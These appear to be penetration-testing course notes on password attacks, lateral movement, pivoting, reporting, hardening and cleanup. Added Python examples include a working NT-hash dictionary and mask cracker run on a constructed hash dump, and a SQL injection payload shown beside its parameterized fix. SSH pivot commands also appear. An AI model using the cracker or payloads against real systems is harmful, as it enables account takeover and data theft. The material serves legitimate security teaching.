2. Attacking Passwords on Linux and Windows


Linux:
 Passwords stored as hashes in /etc/shadow.
 Crack using tools that identify the hash algorithm and apply cracking techniques.
Windows:
 Local credentials stored in the SAM database; domain credentials in NTDS.dit on
domain controllers.
 Uses:
o LanMan (LM) and NT hash algorithms; LM is weak and disabled by default on
modern Windows.
o Credentials may also reside in LSASS memory and can be extracted using tools
like Mimikatz.

3. Password Cracking Tools


Common Tools:
 Hashcat:
o Supports dictionary, hybrid, and mask attacks.
o Optimized for GPU acceleration.
 Medusa:
o Parallel brute-forcing tool for network authentication services.
 Brutespray:
o Combines Nmap scan results with Medusa for automated brute force
attacks.
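An offline attack on a Windows hash dump, as an added example that is not part of the original notes and not code from Hashcat or Impacket: a pure-Python MD4 (the NT hash is MD4 over the UTF-16LE password), a dictionary pass with Hashcat-style mangling rules, then a mask pass for what the dictionary missed. The dump is a constructed sample in secretsdump.py's `user:rid:lmhash:nthash:::` format whose hashes are computed here from chosen passwords; the wordlist is a four-word stand-in for a real one.

```python
import itertools
import struct

MASK32 = 0xFFFFFFFF


def md4(data):
    """MD4 (RFC 1320). NT hash = MD4(password encoded as UTF-16LE)."""
    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & MASK32

    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z

    msg = bytearray(data) + b"\x80"                  # pad: 0x80, zeros, 64-bit LE bit length
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r2 = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)
    r3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):                           # round 1
            a = rotl((a + f(b, c, d) + x[i]) & MASK32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                           # round 2
            a = rotl((a + g(b, c, d) + x[r2[i]] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                           # round 3
            a = rotl((a + h(b, c, d) + x[r3[i]] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & MASK32, (b + bb) & MASK32, (c + cc) & MASK32, (d + dd) & MASK32
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password):
    return md4(password.encode("utf-16le")).hex()


EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM field when LM hashes are disabled

# Constructed sample dump; every hash is derived here from the password named in the comment.
SAMPLE_DUMP = "\n".join([
    f"Administrator:500:{EMPTY_LM}:{nt_hash('Password1')}:::",                    # dictionary + rule
    f"Guest:501:{EMPTY_LM}:{EMPTY_NT}:::",                                        # blank password
    f"svc_backup:1105:{EMPTY_LM}:{nt_hash('2024')}:::",                           # 4-digit mask
    f"jdoe:1106:{EMPTY_LM}:{nt_hash('correct horse battery staple')}:::",         # stays uncracked
])
WORDLIST = ["password", "welcome", "summer", "letmein"]   # constructed mini wordlist


def parse_dump(text):
    """Return (user, rid, nthash) for each secretsdump-style line."""
    entries = []
    for line in text.strip().splitlines():
        user, rid, _lm, nt = line.split(":")[:4]
        entries.append((user, int(rid), nt.lower()))
    return entries


def dictionary_candidates(words):
    """Hashcat-style mangling rules applied to every wordlist entry."""
    for w in words:
        for base in (w, w.capitalize(), w.upper()):
            yield base
            for suffix in ("1", "123", "!", "2024"):
                yield base + suffix


MASK_SETS = {"d": "0123456789", "l": "abcdefghijklmnopqrstuvwxyz",
             "u": "ABCDEFGHIJKLMNOPQRSTUVWXYZ"}


def mask_candidates(mask):
    """Brute force constrained by a hashcat mask such as '?d?d?d?d'."""
    sets = [MASK_SETS[ch] for ch in mask.split("?")[1:]]
    yield from ("".join(t) for t in itertools.product(*sets))


def crack(entries, candidates):
    """Hash each candidate once and look it up against every target hash."""
    wanted = {}
    for user, _rid, nt in entries:
        wanted.setdefault(nt, []).append(user)
    found = {user: "" for user in wanted.get(EMPTY_NT, [])}   # blank passwords need no work
    total = sum(len(v) for v in wanted.values())
    for pw in candidates:
        for user in wanted.get(nt_hash(pw), []):
            found.setdefault(user, pw)
        if len(found) == total:
            break
    return found


def crack_dump(dump_text):
    entries = parse_dump(dump_text)
    found = crack(entries, dictionary_candidates(WORDLIST))
    remaining = [e for e in entries if e[0] not in found]
    found.update(crack(remaining, mask_candidates("?d?d?d?d")))
    return found


if __name__ == "__main__":
    for user, pw in crack_dump(SAMPLE_DUMP).items():
        print(f"{user}: {pw!r}")
```

Cracking is done per candidate rather than per user so the cost is one MD4 per guess regardless of how many hashes are in the dump; that, plus the absence of any salt, is why NT hashes fall so quickly on a GPU and why Hashcat's rule and mask modes are the same two strategies shown here.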

4. Lateral Movement
Definition:
 Involves moving from one system to another within a network after compromising
the initial host.
Techniques:
1. Remote Access Tools:
o Use RDP, SSH, WinRM, and PsExec for executing commands on remote
systems.
2. Enumerating Hosts:
o Map the network to identify potential targets.
3. Exploring Protocols:
o Leverage RPC, DCOM, and SMB to move laterally.

5. Pivoting
Definition:
 Gaining access to systems or networks that were inaccessible from the initial
attack vector by exploiting a compromised host.
Techniques:
 Port Forwarding:
o Redirects traffic to internal systems through the compromised host (e.g.,
ssh -L 8080:internal-host:80 user@pivot, or a SOCKS proxy via ssh -D 1080
used with proxychains).
 VPN and SSH Tunnels:
o Establish encrypted connections to pivot into different segments.
 Routing Table Modifications:
o Alter network routes to enable access to new systems.

6. Privilege Escalation
Types:
1. Vertical Escalation:
o Gain higher privileges, such as admin or root access.
2. Horizontal Escalation:
o Access other user accounts with similar privileges.
Windows Techniques:
 Exploit services, drivers, or misconfigurations.
 Leverage unpatched vulnerabilities or kernel-specific exploits.
Linux Techniques:
 Exploit root-owned services or poorly configured cron jobs.
 Leverage software vulnerabilities in SUID binaries.

7. Persistence Techniques
Definition:
 Ensuring continued access to a compromised system even after detection
attempts.
Methods:
1. Backdoors:
o Hidden mechanisms for unauthorized access.
o Example: Remote Access Trojans (RATs).
2. Scheduled Tasks:
o Windows: Use Task Scheduler to automate commands or scripts.
o Linux: Configure cron jobs for similar functionality.
3. Registry Modifications:
o Modify startup keys to execute malicious programs at boot.

8. Shell Types
Reverse Shell:
 The target system initiates a connection back to the attacker's machine, which is
listening on a specific port.
Bind Shell:
 The target system opens a listening port that the attacker connects to.
Daemons:
 Background processes (services on Windows, daemons on Unix) enable remote
access, even after reboots.

9. Advanced Persistent Threats (APT)


Characteristics:
 Long-term attacks targeting high-value organizations.
 Relies on sophisticated, stealthy techniques for data exfiltration over extended
periods.

10. Key Takeaways


 Offline attacks require obtaining password files or hashes for cracking.
 Lateral movement expands access to more systems within a network.
 Privilege escalation focuses on gaining higher or alternative access.
 Persistence ensures continued access and control even after detection attempts.
Module 17

1. Defining the Communication Path


Importance of Communication
 Essential for the success of a PenTest.
 Prevents risky or damaging decisions by having predefined escalation paths.
 Facilitates clarity during unexpected incidents.
Key Communication Elements
 Escalation Path:
o When and how the client will notify the PenTest team about system issues
caused by the test.
o When and how the PenTest team will involve the client IT team for
accidents or system destabilization.
 Stakeholder Awareness:
o IT managers and security officers (CIO/CISO) should be aware of the
PenTest.
o Restrict knowledge of the PenTest to avoid alerting staff when testing for
social engineering defenses.
Designated Points of Contact
 Primary Contact:
o Handles major decisions, often the CISO or project manager.
 Technical Contact:
o Manages technology-related elements of the PenTest and assesses
system impact.
 Emergency Contact:
o Available during business hours or 24/7 for urgent issues.

2. Communication Triggers
Reasons to Initiate Communication
 Status Reports:
o Regular progress updates to the client.
 Emergencies:
o Immediate communication for incidents or unplanned disruptions.
 Critical Findings:
o High-risk vulnerabilities identified during testing.
Prioritizing Findings
 PenTesting is a dynamic process requiring flexible prioritization.
 Findings during reconnaissance may redirect the PenTest focus.
 Adjustments may be required for significant new vulnerabilities or client-
requested changes.
Providing Situational Awareness
 Communicating detected PenTest attempts to appropriate contacts minimizes
conflict and enables the test to continue effectively.
Criminal Activity
 PenTesters must notify law enforcement if evidence of criminal conduct is
discovered.
 Consult legal counsel to handle such findings responsibly.
False Positives
 Common causes:
o Outdated vulnerability definitions.
o Misinterpreted customizations in the target environment.
o Incorrectly scored vulnerabilities.
 Mitigation:
o Use result validation techniques.
o Conduct additional reconnaissance to avoid false positives.

3. Reporting and Presenting Findings


Best Practices for Reporting
 Use Standards:
o Penetration Testing Execution Standard (PTES) provides clear guidelines
for presenting results.
o Classify vulnerabilities (technical or logical) for clarity.
 Frameworks:
o Dradis:
 Centralized framework for sharing PenTest details.
 Ensures team consistency and avoids redundant work.
o Nessus Reporting Module:
 Prebuilt templates standardize reports for consistency across
clients.
Key Report Components
 Summary of results.
 Classified vulnerabilities (e.g., critical, high, medium, low).
 Details of exploits, remediation suggestions, and risk analysis.

4. Key Takeaways
 Communication during PenTesting ensures efficiency and avoids potential
conflicts.
 Define escalation paths and roles clearly.
 Use standardized tools like Dradis and Nessus for consistent and detailed
reporting.

Module 18

1. Identifying the Report Audience


Importance of Audience Identification
 Tailor the PenTest report to the specific stakeholders to ensure the information is
actionable and understandable.
 Stakeholders may include:
o C-Suite Executives (e.g., CEO, CTO):
 Require high-level summaries for decision-making.
o Third-Party Stakeholders:
 Regulators, investors, or service providers who may indirectly be
involved.
o Technical Staff:
 Includes IT personnel responsible for maintaining systems.
o Developers:
 Focus on creating and implementing technical solutions.

2. Report Components
Executive Summary
• A concise, non-technical overview of:
  o The testing process.
  o Key findings and their potential impact.
  o A closing conclusion statement summarizing whether the PenTest objectives were met.
Scope Details
• Description of the engagement’s boundaries:
  o What was tested.
  o Deviations from the original scope or unexpected challenges.
Methodology
• High-level explanation of:
  o Standards or frameworks followed (e.g., NIST, PTES).
  o General activities performed and tools used.
Attack Narrative
• A detailed account of:
  o The steps taken during the PenTest.
  o How vulnerabilities were exploited.
  o How the steps map to the defined methodology.
Findings
• Organized presentation of:
  o Vulnerabilities, threat levels, and risk ratings.
  o Exploitable versus non-exploitable weaknesses.
  o Reproducible steps for validation.
Business Impact Analysis (BIA)
• Assesses the potential impact of findings:
  o Identifies processes, assets, or data critical to business continuity.
  o Helps prioritize remediation efforts based on operational risk.
Metrics and Measures
• Quantifiable results displayed in tables or graphs.
• Examples:
  o Number of high-severity vulnerabilities.
  o Comparison of vulnerabilities across previous tests.
Remediation Recommendations
• Provides solutions for each identified issue.
• Examples:
  o Weak password policies: implement stronger password requirements.
  o No multi-factor authentication (MFA): recommend MFA implementation.
Conclusion and Appendix
• Conclusion:
  o Summary of successes, failures, and whether the overall objectives were met.
  o Key takeaways and a brief statement about next steps.
• Appendix:
  o Contains supporting evidence such as:
    ▪ Screenshots, logs, and detailed test results.

3. Risk Management
Risk Appetite
• The organization’s tolerance for vulnerabilities or threats.
• Helps determine the priority for addressing issues, based on:
  o Potential financial loss.
  o Operational disruption.
Risk Rating
• Quantifies vulnerabilities using frameworks such as:
  o CVSS (Common Vulnerability Scoring System).
  o NIST Cybersecurity Framework (CSF).
Risk Prioritization
• Adjusts risk ratings to align with client-specific needs, focusing on:
  o Data sensitivity (e.g., PII, PHI).
  o Network exposure.
  o Accessibility concerns.

4. Best Practices for Reporting
Storage and Distribution
• Reports should be:
  o Stored securely to prevent unauthorized access.
  o Distributed only to appropriate personnel, using repositories with controlled access levels.
Ongoing Documentation
• Document findings as they occur during testing.
• Maintain detailed notes and evidence for:
  o Validating findings.
  o Enhancing the report’s credibility.
Identifying Themes and Root Causes
• Recognize common issues, for example:
  o Use of outdated cryptographic protocols.
  o Poor employee adherence to cybersecurity best practices.
• Offer industry-relevant best practices in response.
Observations
• Include additional details about:
  o Deviations from scope.
  o Critical actions taken during testing.
  o Areas for improvement in future engagements.

Module 19

1. Employing Technical Controls
System Hardening
• Techniques to secure devices and applications:
  o Install patches and updates promptly.
  o Use firewalls and anti-malware solutions.
  o Disable unused ports and services.
  o Remove unnecessary software.
  o Segment hosts on the network for improved isolation.
Input Sanitization
• Protects applications from code injection attacks (e.g., SQL injection, XSS) by:
  o Escaping text to prevent unintended execution.
  o Null byte sanitization to remove malicious payloads.
  o Using parameterized queries for safe SQL processing.
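An added example (not part of the notes) showing the three input-sanitization controls side by side on a constructed in-memory SQLite table: a vulnerable string-built query next to its parameterized form, null byte stripping, and HTML escaping before output.

```python
# Added example (not from the course notes): the three sanitization controls
# above, demonstrated on a constructed in-memory SQLite users table.
import html
import sqlite3

# Constructed sample data; the database exists only in memory.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (name TEXT, role TEXT)")
db.executemany("INSERT INTO users VALUES (?, ?)",
               [("alice", "admin"), ("bob", "user"), ("carol", "user")])


def lookup_unsafe(name):
    """Vulnerable: user input is spliced straight into the SQL text."""
    rows = db.execute(f"SELECT name FROM users WHERE name = '{name}'").fetchall()
    return [r[0] for r in rows]


def lookup_safe(name):
    """Parameterized query: the driver passes the value separately from the
    statement, so quotes in the input can never change the query's structure."""
    rows = db.execute("SELECT name FROM users WHERE name = ?", (name,)).fetchall()
    return [r[0] for r in rows]


def strip_null_bytes(text):
    """Null byte sanitization: C-based layers (filesystems, libc) stop reading
    at \\x00, so 'report.pdf\\x00.sh' might be treated as 'report.pdf'."""
    return text.replace("\x00", "")


def render_greeting(name):
    """Escape text before embedding it in HTML so it renders as data, not markup."""
    return f"<p>Hello, {html.escape(strip_null_bytes(name), quote=True)}</p>"


if __name__ == "__main__":
    payload = "x' OR '1'='1"                     # classic textbook injection string
    print(lookup_unsafe(payload))   # ['alice', 'bob', 'carol']: injection succeeded
    print(lookup_safe(payload))     # []: the literal string matched no row
    print(render_greeting("<script>alert(1)</script>"))  # escaped, inert markup
```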
Multi-Factor Authentication (MFA)
• Combines two or more authentication factors:
  o Something You Know: passwords.
  o Something You Have: security tokens, smart cards.
  o Something You Are: biometric verification.
Password Encryption
• Store passwords securely so that they cannot be recovered and reused:
  o Avoid unsalted hashes, which are vulnerable to rainbow table attacks.
  o Use encrypted databases or password managers for storing credentials.
Patch Management
• The process of identifying, testing, and deploying OS and application updates:
  o Document applied patches.
  o Note unpatched systems and the alternative mitigations in place.
Key Rotation
• Periodically replace access keys for systems or repositories:
  o Set expiry periods for keys.
  o Enforce minimum key length and complexity.
Certificate Management
• Administer and secure digital certificates:
  o Revoke and replace compromised certificates.
  o Implement certificate pinning to mitigate man-in-the-middle attacks.
Secret Management Solutions
• Securely store sensitive information such as passwords and key pairs using:
  o Dedicated platforms that support both dynamic and static credentials.
Network Segmentation
• Logical separation of infrastructure via subnets, VLANs, or firewalls:
  o Determine which services should be internal and which internet-facing.
  o Use air-gapped networks for critical systems.

2. Employing Administrative and Operational Controls
Policies and Procedures
• Establish guidelines to reduce cybersecurity risk:
  o Define the technical controls to be used.
  o Review and update policies as needed.
  o Incorporate key performance indicators (KPIs) for evaluation.
Role-Based Access Control (RBAC)
• Assign access permissions based on job function:
  o Apply ACLs (Access Control Lists) to logical resources (e.g., servers, databases) and physical resources (e.g., building access).
Password Policies
• Implement strategies to minimize credential-based attacks:
  o Avoid plaintext storage; hash passwords.
  o Use a strong cryptographic hash function such as bcrypt.
  o Enforce minimum complexity and expiration policies.
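An added example (not from the notes) covering both the Password Encryption bullets in the technical controls section and the Password Policies here: an unsalted hash beside a per-user salted one, constant-time verification, and an assumed complexity rule. PBKDF2-HMAC from the Python standard library stands in for the bcrypt the notes recommend, so the block runs without third-party packages; the sample password and policy thresholds are constructed for illustration.

```python
# Added example (not from the course notes): salted password hashing plus a
# minimum-complexity check. PBKDF2-HMAC from the standard library stands in
# for bcrypt so the block runs without third-party packages.
import hashlib
import hmac
import os
import re

ITERATIONS = 600_000  # deliberately slow; tune to the hardware in use

def unsalted_hash(password):
    """What NOT to do: identical passwords give identical digests, so one
    precomputed (rainbow) table cracks every account sharing a password."""
    return hashlib.sha256(password.encode()).hexdigest()

def hash_password(password, salt=None):
    """Per-user random salt + PBKDF2; stored as 'salt$digest' in hex."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt.hex() + "$" + digest.hex()

def verify_password(password, stored):
    """Recompute with the stored salt; constant-time compare avoids timing leaks."""
    salt_hex, digest_hex = stored.split("$", 1)
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    bytes.fromhex(salt_hex), ITERATIONS)
    return hmac.compare_digest(candidate.hex(), digest_hex)

def meets_policy(password, min_length=12):
    """Assumed policy for illustration: minimum length plus three of four
    character classes (lower, upper, digit, symbol)."""
    classes = sum(bool(re.search(p, password))
                  for p in (r"[a-z]", r"[A-Z]", r"\d", r"[^\w]"))
    return len(password) >= min_length and classes >= 3

if __name__ == "__main__":
    pw = "Correct-Horse-9"                           # constructed sample password
    print(unsalted_hash(pw) == unsalted_hash(pw))    # True: same digest for every user
    first, second = hash_password(pw), hash_password(pw)
    print(first != second, verify_password(pw, first), verify_password("wrong", first))
    print(meets_policy(pw), meets_policy("password"))  # True False
```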
Secure Development Lifecycle (SDLC)
• Integrate security at every stage of development:
  o Follow best practices during the design, coding, and testing phases.
  o Avoid insecure practices such as hard-coded credentials and verbose error handling.
Mobile Device Management (MDM)
• Centrally manage security policies for mobile devices:
  o Perform regular vulnerability scans.
  o Conduct penetration tests annually or biannually.
People as a Security Factor
• Mitigation strategies:
  o Regular security training for employees.
  o Reinforce secure practices, with penalties for non-compliance.
Operational Considerations
• Job Rotation: prevent insider threats by periodically shifting roles.
• Time-of-Day Restrictions: limit access outside working hours.
• Mandatory Vacations: detect fraudulent activity during absences.

3. Employing Physical Controls
Building Access Control
• Manage access to facilities based on individual permissions:
  o Use RFID cards for controlled entry.
  o Supplement with physical barriers such as turnstiles and locked doors.
Biometric Controls
• Rely on unique biological characteristics for secure access:
  o Examples include fingerprint scanners and iris recognition.
Video Surveillance
• Monitor activity for security:
  o Prefer wired connections over Wi-Fi to reduce attack vectors.
  o Patch camera firmware to close known vulnerabilities.

4. Key Recommendations for Clients
• Implement policies that align with industry standards and best practices.
• Regularly audit and test systems for vulnerabilities.
• Integrate security into both technical and operational workflows.
• Train employees to recognize and mitigate social engineering threats.

Module 20

1. Post-Engagement Cleanup
Purpose
• Ensures that no artifacts from the PenTest remain on the system, since attackers could potentially exploit them.
• Focuses on restoring systems to their state before testing.
Key Tasks
1. Deleting New Files:
  o Remove any files created during testing from affected systems.
2. Restoring Log Files:
  o Replace or revert any deleted or modified logs.
3. Restoring Applications:
  o Reinstall clean backup copies of any compromised applications.

Removing Shells
• Definition:
  o Shells installed during testing enable persistent unauthorized access if left behind.
• Windows Systems:
  o Remove entries under registry hives such as HKLM and HKCU that launch shells during boot.
• Linux Systems:
  o Delete scripts in /etc/init.d/ and /etc/systemd/ that launch shells at startup.
• Scheduled Tasks:
  o Remove entries in Windows Task Scheduler and Linux crontab that invoke shells.

Deleting Tester-Created Credentials
• Challenges:
  o Local credentials can usually be removed easily, but domain or tightly integrated credentials may require direct database manipulation.
  o Some systems might not allow account deletion without causing integrity issues.

Eliminating Tools
• Tools such as Metasploit payloads, keyloggers, and vulnerability scanner agents may linger unless explicitly removed.
• Tools loaded only in memory may be cleared by a system reboot, but persistent ones require manual removal.
• Securely destroy associated files to prevent recovery.

Destroying Test Data
• Use secure data deletion techniques (e.g., shredding or overwriting) to eliminate sensitive test data.
• Automate cleanup tasks using scripts to ensure consistency and avoid missed steps.
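An added example (not from the notes) of the scripted cleanup the last bullet describes: artifacts are logged in a manifest as they are created during testing, files are overwritten and deleted afterwards, and anything still present (cron lines, local users) is reported for manual removal. The manifest entries, crontab text and passwd text are constructed samples, and the dropped file is created in a temporary directory so the script runs offline.

```python
# Added example (not from the course notes): manifest-driven cleanup check.
# Artifacts are logged as they are created during testing; afterwards files
# are overwritten and deleted, and anything still present is reported.
import os
import tempfile

def shred_file(path):
    """Overwrite with random bytes, then unlink. On SSDs and copy-on-write
    filesystems old blocks may survive, so treat this as best effort."""
    with open(path, "r+b") as fh:
        fh.write(os.urandom(os.path.getsize(path)))
        fh.flush()
        os.fsync(fh.fileno())
    os.remove(path)

def remaining_artifacts(manifest, crontab_text, passwd_text):
    """Return the (kind, value) manifest entries that are still present."""
    left = []
    for kind, value in manifest:
        if kind == "file" and os.path.exists(value):
            left.append((kind, value))
        elif kind == "cron" and value in crontab_text.splitlines():
            left.append((kind, value))
        elif kind == "user" and any(line.split(":")[0] == value
                                    for line in passwd_text.splitlines()):
            left.append((kind, value))
    return left

def run_cleanup(manifest, crontab_text, passwd_text):
    """Shred tester-created files, then report what still needs manual removal."""
    for kind, value in manifest:
        if kind == "file" and os.path.isfile(value):
            shred_file(value)
    return remaining_artifacts(manifest, crontab_text, passwd_text)

def demo():
    """Constructed scenario: one dropped file, one cron line, one local user."""
    tmp = tempfile.mkdtemp()
    dropped = os.path.join(tmp, "scan_output.txt")
    with open(dropped, "wb") as fh:
        fh.write(b"constructed test data\n")
    manifest = [("file", dropped), ("cron", "@reboot /opt/pentest/agent.sh"),
                ("user", "pentest-svc")]
    crontab = "0 3 * * * /usr/bin/backup.sh\n@reboot /opt/pentest/agent.sh\n"
    passwd = "root:x:0:0:root:/root:/bin/bash\npentest-svc:x:1500:1500::/home/p:/bin/sh\n"
    return run_cleanup(manifest, crontab, passwd)

if __name__ == "__main__":
    print(demo())  # file is gone; the cron line and user still need manual removal
```

The remaining list is what goes into the cleanup section of the report, so the client can confirm each leftover item was removed by its own administrators.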

2. Follow-Up Actions
Gaining Client Acceptance
• Purpose:
  o Confirm that the client accepts the report and findings.
• Steps:
  o Discuss the findings, address clarifications, and note any concerns regarding the testing process.
Confirming Findings
• Attestation:
  o The PenTester signs off on the report, verifying the authenticity of the findings.
  o Evidence (e.g., screenshots, exfiltrated data) must be presented to substantiate claims.
Planning a Retest
• Objective:
  o Assess whether the client has successfully mitigated the identified vulnerabilities.
• Steps:
  o Schedule retesting after the client implements remediation steps.
  o Focus on previously discovered vulnerabilities and any new findings.
  o Provide feedback on progress.

Reviewing Lessons Learned
• Goal:
  o Improve future PenTest processes by analyzing what worked well and what didn’t.
• Key Questions:
  o What vulnerabilities and exploits were identified?
  o What aspects of the test were successful?
  o What could have been done better?
• Outcome:
  o Draft a Lessons Learned Report (LLR) or After-Action Report (AAR) for continuous improvement.

3. Key Takeaways
• Cleanup Tasks:
  o Systematic removal of shells, tools, and credentials ensures no traces are left behind.
• Client Communication:
  o Regular discussions and attestation build trust and ensure alignment on findings.
• Retesting:
  o Validates remediation efforts and identifies any remaining vulnerabilities.
• Process Improvement:
  o Lessons learned help refine PenTesting methodologies for future engagements.